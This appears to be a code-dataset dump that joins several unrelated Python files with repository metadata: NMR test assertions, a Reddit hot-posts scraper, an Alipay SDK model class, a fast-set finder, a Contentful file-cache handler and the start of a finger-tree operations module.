self.assertEqual(len(cdp.mol), 1)
self.assertEqual(cdp.mol[0].name, 'Ap4Aase_res1-12_mol1')
self.assertEqual(len(cdp.mol[0].res), 3)
# 1st residue.
self.assertEqual(cdp.mol[0].res[0].num, 1)
self.assertEqual(cdp.mol[0].res[0].name, 'GLY')
self.assertEqual(len(cdp.mol[0].res[0].spin), 1)
self.assertEqual(cdp.mol[0].res[0].spin[0].num, 1)
self.assertEqual(cdp.mol[0].res[0].spin[0].name, 'N')
# 2nd residue.
self.assertEqual(cdp.mol[0].res[1].num, 4)
self.assertEqual(cdp.mol[0].res[1].name, 'GLY')
self.assertEqual(len(cdp.mol[0].res[1].spin), 1)
self.assertEqual(cdp.mol[0].res[1].spin[0].num, 43)
self.assertEqual(cdp.mol[0].res[1].spin[0].name, 'N')
# 3rd residue.
self.assertEqual(cdp.mol[0].res[2].num, 12)
self.assertEqual(cdp.mol[0].res[2].name, 'GLY')
self.assertEqual(len(cdp.mol[0].res[2].spin), 1)
self.assertEqual(cdp.mol[0].res[2].spin[0].num, 144)
self.assertEqual(cdp.mol[0].res[2].spin[0].name, 'N')
def test_load_protein_N_spins_from_pdb(self):
"""Load the protein backbone amide N spins from a loaded PDB file."""
# Read the PDB file.
self.interpreter.structure.read_pdb(file='Ap4Aase_res1-12.pdb', dir=status.install_path + sep+'test_suite'+sep+'shared_data'+sep+'structures', read_model=1)
# Generate the sequence (1 molecule, all residues, and only N spins).
self.interpreter.structure.load_spins(spin_id='@N')
# Test some of the sequence.
self.assertEqual(len(cdp.mol), 1)
self.assertEqual(cdp.mol[0].name, 'Ap4Aase_res1-12_mol1')
self.assertEqual(len(cdp.mol[0].res), 12)
# 1st residue.
self.assertEqual(cdp.mol[0].res[0].num, 1)
self.assertEqual(cdp.mol[0].res[0].name, 'GLY')
self.assertEqual(len(cdp.mol[0].res[0].spin), 1)
self.assertEqual(cdp.mol[0].res[0].spin[0].num, 1)
self.assertEqual(cdp.mol[0].res[0].spin[0].name, 'N')
# 2nd residue.
self.assertEqual(cdp.mol[0].res[1].num, 2)
self.assertEqual(cdp.mol[0].res[1].name, 'PRO')
self.assertEqual(len(cdp.mol[0].res[1].spin), 1)
self.assertEqual(cdp.mol[0].res[1].spin[0].num, 10)
self.assertEqual(cdp.mol[0].res[1].spin[0].name, 'N')
# 3rd residue.
self.assertEqual(cdp.mol[0].res[2].num, 3)
self.assertEqual(cdp.mol[0].res[2].name, 'LEU')
self.assertEqual(len(cdp.mol[0].res[2].spin), 1)
self.assertEqual(cdp.mol[0].res[2].spin[0].num, 24)
self.assertEqual(cdp.mol[0].res[2].spin[0].name, 'N')
# 4th residue.
self.assertEqual(cdp.mol[0].res[3].num, 4)
self.assertEqual(cdp.mol[0].res[3].name, 'GLY')
self.assertEqual(len(cdp.mol[0].res[3].spin), 1)
self.assertEqual(cdp.mol[0].res[3].spin[0].num, 43)
self.assertEqual(cdp.mol[0].res[3].spin[0].name, 'N')
# 5th residue.
self.assertEqual(cdp.mol[0].res[4].num, 5)
self.assertEqual(cdp.mol[0].res[4].name, 'SER')
self.assertEqual(len(cdp.mol[0].res[4].spin), 1)
self.assertEqual(cdp.mol[0].res[4].spin[0].num, 50)
self.assertEqual(cdp.mol[0].res[4].spin[0].name, 'N')
# 6th residue.
self.assertEqual(cdp.mol[0].res[5].num, 6)
self.assertEqual(cdp.mol[0].res[5].name, 'MET')
self.assertEqual(len(cdp.mol[0].res[5].spin), 1)
self.assertEqual(cdp.mol[0].res[5].spin[0].num, 61)
self.assertEqual(cdp.mol[0].res[5].spin[0].name, 'N')
# 7th residue.
self.assertEqual(cdp.mol[0].res[6].num, 7)
self.assertEqual(cdp.mol[0].res[6].name, 'ASP')
self.assertEqual(len(cdp.mol[0].res[6].spin), 1)
self.assertEqual(cdp.mol[0].res[6].spin[0].num, 78)
self.assertEqual(cdp.mol[0].res[6].spin[0].name, 'N')
# 8th residue.
self.assertEqual(cdp.mol[0].res[7].num, 8)
self.assertEqual(cdp.mol[0].res[7].name, 'SER')
self.assertEqual(len(cdp.mol[0].res[7].spin), 1)
self.assertEqual(cdp.mol[0].res[7].spin[0].num, 90)
self.assertEqual(cdp.mol[0].res[7].spin[0].name, 'N')
# 9th residue.
self.assertEqual(cdp.mol[0].res[8].num, 9)
self.assertEqual(cdp.mol[0].res[8].name, 'PRO')
self.assertEqual(len(cdp.mol[0].res[8].spin), 1)
self.assertEqual(cdp.mol[0].res[8].spin[0].num, 101)
self.assertEqual(cdp.mol[0].res[8].spin[0].name, 'N')
# 10th residue.
self.assertEqual(cdp.mol[0].res[9].num, 10)
self.assertEqual(cdp.mol[0].res[9].name, 'PRO')
self.assertEqual(len(cdp.mol[0].res[9].spin), 1)
self.assertEqual(cdp.mol[0].res[9].spin[0].num, 115)
self.assertEqual(cdp.mol[0].res[9].spin[0].name, 'N')
# 11th residue.
self.assertEqual(cdp.mol[0].res[10].num, 11)
self.assertEqual(cdp.mol[0].res[10].name, 'GLU')
self.assertEqual(len(cdp.mol[0].res[10].spin), 1)
self.assertEqual(cdp.mol[0].res[10].spin[0].num, 129)
self.assertEqual(cdp.mol[0].res[10].spin[0].name, 'N')
# 12th residue.
self.assertEqual(cdp.mol[0].res[11].num, 12)
self.assertEqual(cdp.mol[0].res[11].name, 'GLY')
self.assertEqual(len(cdp.mol[0].res[11].spin), 1)
self.assertEqual(cdp.mol[0].res[11].spin[0].num, 144)
self.assertEqual(cdp.mol[0].res[11].spin[0].name, 'N')
def test_read(self):
"""The sequence.read() test."""
# Read the sequence.
self.interpreter.sequence.read(file='test_seq', dir=status.install_path + sep+'test_suite'+sep+'shared_data', res_num_col=1, res_name_col=2)
# Test some of the sequence.
self.assertEqual(len(cdp.mol), 1)
self.assertEqual(cdp.mol[0].name, None)
self.assertEqual(len(cdp.mol[0].res), 5)
# 1st residue.
self.assertEqual(cdp.mol[0].res[0].num, -2)
self.assertEqual(cdp.mol[0].res[0].name, 'Gly')
self.assertEqual(len(cdp.mol[0].res[0].spin), 1)
self.assertEqual(cdp.mol[0].res[0].spin[0].num, None)
self.assertEqual(cdp.mol[0].res[0].spin[0].name, None)
def test_sequence_copy(self):
"""Test the sequence.copy user function."""
# First create some spins.
self.interpreter.spin.create(spin_name='A', spin_num=1, res_num=1)
self.interpreter.spin.create(spin_name='A', spin_num=2, res_num=1)
self.interpreter.spin.create(spin_name='B', spin_num=3, res_num=1)
self.interpreter.spin.create(spin_name='B2', spin_num=4, res_num=1)
self.interpreter.spin.create(spin_name='A', spin_num=1, res_num=2)
self.interpreter.spin.create(spin_name='A', spin_num=2, res_num=2)
self.interpreter.spin.create(spin_name='B', spin_num=3, res_num=2)
self.interpreter.spin.create(spin_name='B2', spin_num=4, res_num=2)
# Create a new data pipe to copy to.
self.interpreter.pipe.create('seq copy test', 'mf')
# Copy the sequence.
self.interpreter.sequence.copy(pipe_from='mf')
# Alias the data pipes.
pipe1 = ds['mf']
pipe2 = ds['seq copy test']
# Check the residue count.
self.assertEqual(len(pipe1.mol[0].res), len(pipe2.mol[0].res))
# Check the spin counts.
for i in range(len(pipe1.mol[0].res)):
self.assertEqual(len(pipe1.mol[0].res[i].spin), len(pipe2.mol[0].res[i].spin))
| [
"bugman@b7916896-f9f9-0310-9fe5-b3996d8957d5"
] | bugman@b7916896-f9f9-0310-9fe5-b3996d8957d5 |
986648f850c2baa86b81a830fe9aa86b1cb75ddc | ff60a647a3cc566220f5cefc8ddec7e1f865ac20 | /0x13-count_it/2-recurse.py | 01d85f2ffb597b45e64d288db5d85c4b052c9f42 | [] | no_license | mag389/holbertonschool-interview | cf6c2cc568bc321dcd705fbb76ad1e13ff8ba4f7 | 6f5b621d7a03efb990970e8c28ac41c1498aa6cd | refs/heads/main | 2023-07-19T05:57:50.296276 | 2021-09-09T14:34:02 | 2021-09-09T14:34:02 | 319,713,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,447 | py | #!/usr/bin/python3
""" script to scrape and count words from reddit hot posts
"""
import requests
import time
import urllib
import sys
def recurse(subreddit, hot_list=[], after=""):
""" uses reddit api to give top 10 hot posts
in a subreddit
"""
custom_user = {"User-Agent": "custom"}
url = "https://www.reddit.com/r/" + subreddit + "/hot.json"
print(url)
if after == "":
params = {'limit': 1, 'count': 1}
else:
params = {'limit': 1, 'count': 1, 'after': after}
params = {'after': after}
# print("right before request")
res = requests.get(url,
headers=custom_user, params=params,
allow_redirects=False)
# print(res.status_code)
if res.status_code != 200:
return(None)
else:
info = res.json()
# print(info)
children = info.get('data').get('children')
if children is None or len(children) == 0:
return (hot_list)
for child in children:
hot_list.append(child.get('data').get("title"))
# child = children[len(children) - 1]
# title = child.get('data').get("title")
# print(title)
# hot_list.append(child.get('data').get("title"))
after = info.get('data').get('after')
print(after)
if after == 'null' or after is None:
return (hot_list)
return (recurse(subreddit, hot_list, after))
| [
"mag389@cornell.edu"
] | mag389@cornell.edu |
2abce665437b0f3f3ab17d70c43c98a0c6ebc291 | 5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d | /alipay/aop/api/domain/AlipayInsSceneFamilydoctorItemBatchqueryModel.py | 4a78f51f516c09e2559b61451709e855a8a875f6 | [
"Apache-2.0"
] | permissive | alipay/alipay-sdk-python-all | 8bd20882852ffeb70a6e929038bf88ff1d1eff1c | 1fad300587c9e7e099747305ba9077d4cd7afde9 | refs/heads/master | 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 | Apache-2.0 | 2023-04-25T04:54:02 | 2018-05-14T09:40:54 | Python | UTF-8 | Python | false | false | 3,638 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipayInsSceneFamilydoctorItemBatchqueryModel(object):
def __init__(self):
self._ant_ser_contract_no = None
self._disease_name_list = None
self._emergency = None
self._general_name_list = None
@property
def ant_ser_contract_no(self):
return self._ant_ser_contract_no
@ant_ser_contract_no.setter
def ant_ser_contract_no(self, value):
self._ant_ser_contract_no = value
@property
def disease_name_list(self):
return self._disease_name_list
@disease_name_list.setter
def disease_name_list(self, value):
if isinstance(value, list):
self._disease_name_list = list()
for i in value:
self._disease_name_list.append(i)
@property
def emergency(self):
return self._emergency
@emergency.setter
def emergency(self, value):
self._emergency = value
@property
def general_name_list(self):
return self._general_name_list
@general_name_list.setter
def general_name_list(self, value):
if isinstance(value, list):
self._general_name_list = list()
for i in value:
self._general_name_list.append(i)
def to_alipay_dict(self):
params = dict()
if self.ant_ser_contract_no:
if hasattr(self.ant_ser_contract_no, 'to_alipay_dict'):
params['ant_ser_contract_no'] = self.ant_ser_contract_no.to_alipay_dict()
else:
params['ant_ser_contract_no'] = self.ant_ser_contract_no
if self.disease_name_list:
if isinstance(self.disease_name_list, list):
for i in range(0, len(self.disease_name_list)):
element = self.disease_name_list[i]
if hasattr(element, 'to_alipay_dict'):
self.disease_name_list[i] = element.to_alipay_dict()
if hasattr(self.disease_name_list, 'to_alipay_dict'):
params['disease_name_list'] = self.disease_name_list.to_alipay_dict()
else:
params['disease_name_list'] = self.disease_name_list
if self.emergency:
if hasattr(self.emergency, 'to_alipay_dict'):
params['emergency'] = self.emergency.to_alipay_dict()
else:
params['emergency'] = self.emergency
if self.general_name_list:
if isinstance(self.general_name_list, list):
for i in range(0, len(self.general_name_list)):
element = self.general_name_list[i]
if hasattr(element, 'to_alipay_dict'):
self.general_name_list[i] = element.to_alipay_dict()
if hasattr(self.general_name_list, 'to_alipay_dict'):
params['general_name_list'] = self.general_name_list.to_alipay_dict()
else:
params['general_name_list'] = self.general_name_list
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayInsSceneFamilydoctorItemBatchqueryModel()
if 'ant_ser_contract_no' in d:
o.ant_ser_contract_no = d['ant_ser_contract_no']
if 'disease_name_list' in d:
o.disease_name_list = d['disease_name_list']
if 'emergency' in d:
o.emergency = d['emergency']
if 'general_name_list' in d:
o.general_name_list = d['general_name_list']
return o
| [
"jishupei.jsp@alibaba-inc.com"
] | jishupei.jsp@alibaba-inc.com |
de6378f101239d52c399e53d1291b84af868b941 | f305f84ea6f721c2391300f0a60e21d2ce14f2a5 | /22_专题/implicit_graph/RangeFinder/Finder-fastset.py | ce22f608c5a5bd551f47efa704b5fe7821690be3 | [] | no_license | 981377660LMT/algorithm-study | f2ada3e6959338ae1bc21934a84f7314a8ecff82 | 7e79e26bb8f641868561b186e34c1127ed63c9e0 | refs/heads/master | 2023-09-01T18:26:16.525579 | 2023-09-01T12:21:58 | 2023-09-01T12:21:58 | 385,861,235 | 225 | 24 | null | null | null | null | UTF-8 | Python | false | false | 3,937 | py | # 寻找前驱后继/区间删除
from typing import Optional
class Finder:
"""利用位运算寻找区间的某个位置左侧/右侧第一个未被访问过的位置.
初始时,所有位置都未被访问过.
"""
__slots__ = "_n", "_lg", "_seg"
@staticmethod
def _trailingZeros1024(x: int) -> int:
if x == 0:
return 1024
return (x & -x).bit_length() - 1
def __init__(self, n: int) -> None:
self._n = n
seg = []
while True:
seg.append([0] * ((n + 1023) >> 10))
n = (n + 1023) >> 10
if n <= 1:
break
self._seg = seg
self._lg = len(seg)
for i in range(self._n):
self.insert(i)
def insert(self, i: int) -> None:
for h in range(self._lg):
self._seg[h][i >> 10] |= 1 << (i & 1023)
i >>= 10
def erase(self, i: int) -> None:
for h in range(self._lg):
self._seg[h][i >> 10] &= ~(1 << (i & 1023))
if self._seg[h][i >> 10]:
break
i >>= 10
def next(self, i: int) -> Optional[int]:
"""返回x右侧第一个未被访问过的位置(包含x).
如果不存在,返回None.
"""
if i < 0:
i = 0
if i >= self._n:
return
seg = self._seg
for h in range(self._lg):
if i >> 10 == len(seg[h]):
break
d = seg[h][i >> 10] >> (i & 1023)
if d == 0:
i = (i >> 10) + 1
continue
i += self._trailingZeros1024(d)
for g in range(h - 1, -1, -1):
i <<= 10
i += self._trailingZeros1024(seg[g][i >> 10])
return i
def prev(self, i: int) -> Optional[int]:
"""返回x左侧第一个未被访问过的位置(包含x).
如果不存在,返回None.
"""
if i < 0:
return
if i >= self._n:
i = self._n - 1
seg = self._seg
for h in range(self._lg):
if i == -1:
break
d = seg[h][i >> 10] << (1023 - (i & 1023)) & ((1 << 1024) - 1)
if d == 0:
i = (i >> 10) - 1
continue
i += d.bit_length() - 1024
for g in range(h - 1, -1, -1):
i <<= 10
i += (seg[g][i >> 10]).bit_length() - 1
return i
def islice(self, begin: int, end: int):
"""遍历[start,end)区间内的元素."""
x = begin - 1
while True:
x = self.next(x + 1)
if x is None or x >= end:
break
yield x
def __contains__(self, i: int) -> bool:
return not not self._seg[0][i >> 10] & (1 << (i & 1023))
def __iter__(self):
yield from self.islice(0, self._n)
def __repr__(self):
return f"FastSet({list(self)})"
if __name__ == "__main__":
...
# 前驱后继
def pre(pos: int):
return next((i for i in range(pos, -1, -1) if ok[i]), None)
def nxt(pos: int):
return next((i for i in range(pos, n) if ok[i]), None)
def erase(left: int, right: int):
for i in range(left, right):
ok[i] = False
from random import randint
for _ in range(100):
n = randint(1, 100)
F = Finder(n)
for i in range(n):
F.insert(i)
ok = [True] * n
for _ in range(100):
e = randint(0, n - 1)
F.erase(e)
erase(e, e + 1)
for i in range(n):
assert F.prev(i) == pre(i), (i, F.prev(i), pre(i))
assert F.next(i) == nxt(i), (i, F.next(i), nxt(i))
print("Done!")
| [
"lmt2818088@gmail.com"
] | lmt2818088@gmail.com |
af395d8bcd9241eb4c44624c39fe7ebc590dfbfb | fc04d8c88c98e85b349ba7e2e83f777382f0b723 | /backend/env/bin/isort | b6a6064048de9614320dc7fb78844625762b07be | [] | no_license | Iamprakashkhatri/DjangoReact | b4a653a410195c9fe97a6ca80db579a37d9db8ba | 9196c5ccda4821e054c85dafcc9873dd49ca8121 | refs/heads/master | 2022-12-08T14:18:58.491257 | 2020-08-23T12:52:47 | 2020-08-23T12:52:47 | 289,685,220 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 256 | #!/home/prakash/Downloads/DjangoReact/backend/env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from isort.main import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"prakash"
] | prakash | |
1ef40b11592352d2630e7e1c9536c6dc9c1fa5ee | 2463da77ab902e3728a71fc0a09fb92f687e755d | /contentful_proxy/handlers/files.py | ac9a51f1a693722ac68d98e5b4cf05a01ac3cd13 | [
"MIT"
] | permissive | stanwood/gae-contentful-proxy | 5c2f0aa41819483aa8e428134cc94d4f26c90141 | 739a8b370eb714e27a9f2b50e3772701f52f81df | refs/heads/master | 2020-03-24T20:41:06.798623 | 2019-02-28T10:22:46 | 2019-02-28T10:22:46 | 142,991,557 | 2 | 0 | MIT | 2019-02-28T10:22:47 | 2018-07-31T09:19:16 | Python | UTF-8 | Python | false | false | 4,576 | py | # The MIT License (MIT)
#
# Copyright (c) 2018 stanwood GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import logging
import os
import webapp2
from google.appengine.api import memcache
from google.appengine.api import urlfetch
from google.appengine.ext import ndb
from contentful_proxy.models import files
from contentful_proxy.utils.handlers import storage
from contentful_proxy.utils.handlers import webapp2_base
class CacheHandler(webapp2_base.CustomBaseHandler, storage.CloudClient):
"""Handler which saves a file and returns the file from Google Cloud Storage or from memcache."""
@webapp2.cached_property
def memcache_key(self):
return self.request.path_qs
@webapp2.cached_property
def folder(self):
return self.request.route_kwargs['source_host']
@webapp2.cached_property
def contentful_url(self):
return 'https://{}'.format(self.request.route_kwargs['source_host'])
@webapp2.cached_property
def file_path(self):
return self.request.route_kwargs.get('file_path')
@webapp2.cached_property
def file_path_with_parameters(self):
if self.request.query_string:
file_path_with_parameters = u'{}?{}'.format(self.file_path, self.request.query_string)
else:
file_path_with_parameters = self.file_path
return file_path_with_parameters
@webapp2.cached_property
def file_url(self):
return '{}/{}'.format(self.contentful_url, self.file_path_with_parameters)
def dispatch(self):
"""
Dispatches the request.
If file url is stored in memcache the dispatcher redirects to the memcached file, otherwise it
runs method and set new url to cache.
"""
self.response.headers['Access-Control-Allow-Origin'] = '*'
self.response.headers['Cache-Control'] = 'no-cache'
redirect_url = memcache.get(self.memcache_key)
if redirect_url:
self.redirect(redirect_url, code=303)
else:
super(CacheHandler, self).dispatch()
memcache.set(
self.memcache_key,
self.response.headers['location']
)
def get(self, *args, **kwargs):
"""
Returns file by it's file path.
When file is called first time, file is saved in Google Cloud Storage and its details are saved
in Google Datastore (ndb).
Otherwise, file details are taken from Google Datastore and File is returned from Google Cloud Storage.
Usage:
curl -X GET "https://{domain}.appspot.com/contentful/file_cache/{source_host}/{file_path}
"""
_, file_name = os.path.split(self.file_path)
contentful_file = ndb.Key(files.ContentfulFile, self.file_url).get()
if contentful_file is None:
logging.debug("Image not cached")
response = urlfetch.fetch(self.file_url, deadline=60)
blob = self.store(
file_name=self.file_path_with_parameters + u'/' + file_name,
file_data=response.content,
content_type=response.headers.get('content-type', 'application/octet-stream')
)
blob.make_public()
contentful_file = files.ContentfulFile(
id=self.file_url,
public_url=blob.public_url,
name=blob.name,
memcache_key=self.memcache_key
)
contentful_file.put()
self.redirect(contentful_file.public_url.encode('utf-8'), code=303)
| [
"rivinek@gmail.com"
] | rivinek@gmail.com |
f35a141a6b9327cb830d2aa9efce7a27e0ecb22c | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02797/s548875738.py | 1e4c657afd00f60237371da34c8f737408e516b4 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 197 | py | N,K,S=map(int,input().split())
ans=[]
if S<10**9:
ans=[S for i in range(K)]
ans+=[S+1 for i in range(N-K)]
else:
ans=[S for i in range(K)]
ans+=[1 for i in range(N-K)]
print(*ans) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
d1bf2049a59457c56b84b74c34d47389cacbb62b | 13f4a06cd439f579e34bf38406a9d5647fe7a0f3 | /script/finger_tree_ops.py | 4642df8feb8f57e7fb70984082e457c293f5e93e | [] | no_license | edt-yxz-zzd/python3_src | 43d6c2a8ef2a618f750b59e207a2806132076526 | 41f3a506feffb5f33d4559e5b69717d9bb6303c9 | refs/heads/master | 2023-05-12T01:46:28.198286 | 2023-05-01T13:46:32 | 2023-05-01T13:46:32 | 143,530,977 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 121,767 | py | #HHHHH
r'''
the -> cls The... ISingleton
assert the is T()
arg:iterator/seq/tree
reverse
L/R end
insert at?
replace
extend/join
times/mul
split at?
delete at?
cased_tuple/tuple/FrozenDict-record
per element monoid_ops
measure by index
grep '^def|^class|^\w+\s*=' __file__
grep '^[a-zA-Z_]' __file__
_debug.py forgots
buttom -> bottom
grep buttom -r . -l -i
./nn_ns/CJK/cjk_subsets/cjk_subsets__relationship.py
./nn_ns/CJK/cjk_subsets/cjk_subsets__relationship.py.out/cjk_rel_more.txt
./nn_ns/CJK/cjk_subsets/cjk_subsets__relationship.py.result.txt
./nn_ns/CJK/cjk_subsets/cjk_common_subset.py
./nn_ns/filedir/backup_tools/fsys_mapping_ex.py
./nn_ns/filedir/backup_tools/fsys_mapping_patch.py
./nn_ns/graph/biconnected_planar_d2d3.py
./nn_ns/math_nn/matrix_api.py
view ../../python3_src/seed/ops/IOps4OneMainObjType.py
py -m script.finger_tree_ops
e ../../python3_src/script/finger_tree_ops.py
<<--mv--<< e script/finger_tree_ops.py
e script/finger_tree_ops\[20210504].py
py script/finger_tree_ops.py
view others/数学/编程/tree/finger_tree.txt
finger_tree_ops
raw_finger_tree_ops
mk same name wrapper method:
^\(\s*def \)\(\w*\)\(.*\n.*\):_'$
%s//\1___\2___\3:\2'\r\1\2\3:___\2___'
@abstractmethod
def f(...):
'... #see:_'
==>>
@abstractmethod
def ___f___(...):
'... #see:f'
def f(...):
'... #see:___f___'
get abstractmethod decl
each abstractmethod decl occupy 3 lines
copy whole class body to file end
exec below vim q/ search-cmd && q: edit-cmd, to remove non-abstractmethod func
^\(\s*@abstractmethod.*\)\n\(.*\)\n\(.*\)
.,$s//##?!\1\r##?!\2\r##?!\3
^\(##?!\)\@!.*\n
.,$s//
^\(##?!\)
.,$s//
forward call 4 wrapper class
the undering obj/wrapped obj named '__ops'
each abstractmethod decl has form regex'^\s*def .*/):$''
each abstractmethod decl occupy 3 lines
copy all abstractmethod decls to file end
exec below vim q/ search-cmd && q: edit-cmd, to remove non-abstractmethod func
^\(\s*@abstractmethod.*\)\n\(\s*def \s*\)\([a-zA-Z]\w*\)[(]\(\w\+\)\(, \)\?\(.*\), [/][)]:\n\(\s*\)\(\S.*\)
.,$s//\1\r\2\3(\4\5\6, \/):\r\7\8\r\7return \4.__ops.\3(\6)
^\(\s*@abstractmethod.*\)\n\(\s*def \s*\)\(__\w*__\)[(]\(\w\+\)\(.*\), [/][)]:\n\(\s*\)\(\S.*\)
.,$s//\1\r\2\3(\4\5, \/):\r\6\7\r\6return type(\4.__ops).\3(\4.__ops\5)
@abstractmethod$
.,$s//@override
ReversedFingerTreeOps
TODO:
ops class re-export by diff module
insert/replace/join/times...
auto_info:
order_hash for seq
noncommutable-monoid!!!!
for reversable_finger_tree_ops: should hold both auto_info
unorder_hash for set
add kw reverse to push/...
reversable_finger_tree_ops
#or add invisitable reversed_supernode for node/digit/line_tree/deep_tree, then when unbox reversed deep_tree, neednot to change child attr
add attr reversed for node/digit/line_tree/deep_tree
活着
无数次灭杀仇敌,不断重复就是想不起早已手刃仇敌,永远活在心中
DONE:
xnodes -> xnode_seq
nodes -> node_seq
elements -> element_seq
DONE:
careless_check_ input
careless_check_ output
mk_node
unbox_node
get_auto_info_from_node
get_num_child_xnode_seq_of_node
calc_auto_info_from_xnode_seq
finger_tree_ops__setting__2c3__1T4
finger_tree_ops__setting__3c4__3T7
finger_tree_ops__setting__2c5__2T7
finger_tree_ops__setting__3c5__4T9
finger_tree_ops__setting__3c4c5__2T7
finger_tree_ops__setting__4c5c6c7__2T9
finger_tree_ops__setting__4c5c6c7__2T10
the_monoid_ops4size
the_monoid_ops4max__imay
the_monoid_ops4max__uint
the_monoid_ops4max__tmay
def check_finger_tree_ops__setting(finger_tree_ops__setting:IFingerTreeOps__setting, /):
py -m script.finger_tree_ops > /sdcard/0my_files/tmp/xxx/debug_out.txt
======================
======================
======================
======================
module: __main__: global def heads
class IFingerTreeOps__setting(ABC):
def check_finger_tree_ops__setting(finger_tree_ops__setting:IFingerTreeOps__setting, /):
class IFingerTreeOps(IFingerTreeOps__setting):
def tuple_reversed(seq, /):
def mk_ReversedFingerTreeOps(finger_tree_ops, /):
class WrappedFingerTreeOps__setting(IFingerTreeOps__setting):
class IFingerTreeOps__wrapped_setting(WrappedFingerTreeOps__setting, IFingerTreeOps):
class WrappedFingerTreeOps(IFingerTreeOps__wrapped_setting):
class ReversedFingerTreeOps(WrappedFingerTreeOps):
class abstractmethod_decls_of_IFingerTreeOps(IFingerTreeOps):
NamedTuple4FingerTreeOps__setting = namedtuple(
def mk_NamedTuple4FingerTreeOps__setting(nens, min_max_den_pair, overflow_nen, may_ordered_nens, /):
def mk_FingerTreeOps__setting(nens, min_max_den_pair, overflow_nen, may_ordered_nens, /):
def _mk_FingerTreeOps__setting(nens, min_max_den_pair, /):
class FingerTreeOps__setting(IFingerTreeOps__setting):
finger_tree_ops__setting__2c3__1T4 \
finger_tree_ops__setting__3c4__3T7 \
finger_tree_ops__setting__2c5__2T7 \
finger_tree_ops__setting__3c5__4T9 \
finger_tree_ops__setting__3c4c5__2T7 \
finger_tree_ops__setting__4c5c6c7__2T9 \
finger_tree_ops__setting__4c5c6c7__2T10 \
class IFingerTreeOps__raw_mk_element(IFingerTreeOps):
class IFingerTreeOps__cased_data(IFingerTreeOps__raw_mk_element):
def check_cased_tuple__with_depth(case_name, sz, depth, obj, /):
def _do_nothing(x, /):pass
class FingerTreeOps__funcs(IFingerTreeOps__cased_data, IFingerTreeOps__wrapped_setting):
a_sized_finger_tree_ops = FingerTreeOps__funcs(finger_tree_ops__setting__2c3__1T4, the_monoid_ops4size, calc_auto_info_from_user_obj=lambda user_obj, /:1, careless_check_user_obj=None)
class IFingerTreeOps__sized(IFingerTreeOps):
def offset_may_signed_rng_by_sz(sz, begin, end, /):
def offset_signed_idx_by_sz(sz, idx, /):
class IFingerTreeOps__max_priority(IFingerTreeOps):
======================
======================
======================
======================
#'''
if __name__ == '__main__':
#put anywhere, neednot at eof
from seed.debug._debug import main__print_infos_of_modules as _main
_main([__name__])
__all__ = '''
IFingerTreeOps__setting
check_finger_tree_ops__setting
IFingerTreeOps
tuple_reversed
mk_ReversedFingerTreeOps
WrappedFingerTreeOps__setting
IFingerTreeOps__wrapped_setting
WrappedFingerTreeOps
ReversedFingerTreeOps
abstractmethod_decls_of_IFingerTreeOps
NamedTuple4FingerTreeOps__setting
mk_NamedTuple4FingerTreeOps__setting
mk_FingerTreeOps__setting
FingerTreeOps__setting
finger_tree_ops__setting__2c3__1T4
finger_tree_ops__setting__3c4__3T7
finger_tree_ops__setting__2c5__2T7
finger_tree_ops__setting__3c5__4T9
finger_tree_ops__setting__3c4c5__2T7
finger_tree_ops__setting__4c5c6c7__2T9
finger_tree_ops__setting__4c5c6c7__2T10
IFingerTreeOps__raw_mk_element
IFingerTreeOps__cased_data
check_cased_tuple__with_depth
FingerTreeOps__funcs
a_sized_finger_tree_ops
IFingerTreeOps__sized
offset_may_signed_rng_by_sz
offset_signed_idx_by_sz
IFingerTreeOps__max_priority
'''.split()
#HHHHH
___begin_mark_of_excluded_global_names__0___ = ...
from seed.ops.IOps4OneMainObjType import _mk_reversed_ops, IMonoidOps, the_monoid_ops4size, IMonoidOps4max, mk_ReversedMeasurableOps, IMeasurableOps, mk_ReversedMonoidOps
# view ../../python3_src/seed/ops/IOps4OneMainObjType.py
from seed.helper.check.checkers import check_mapping, check_int, check_uint, check_strict_sorted, check_int_ge1, check_int_ge2, check_all, check_tuple, check_pair, check_instance, check_uint_imay, check_type_is, check_seq, check_len_of, check_union_of_cased_tuples, check_cased_tuple, check_callable, check_bool
#, check_str, check_tmay, check_is_None, check_result_of_cmp, check_result_of_partial_cmp
from seed.types.FrozenDict import FrozenDict, mk_FrozenDict
#from seed.math.floor_ceil import offsetted_divmod
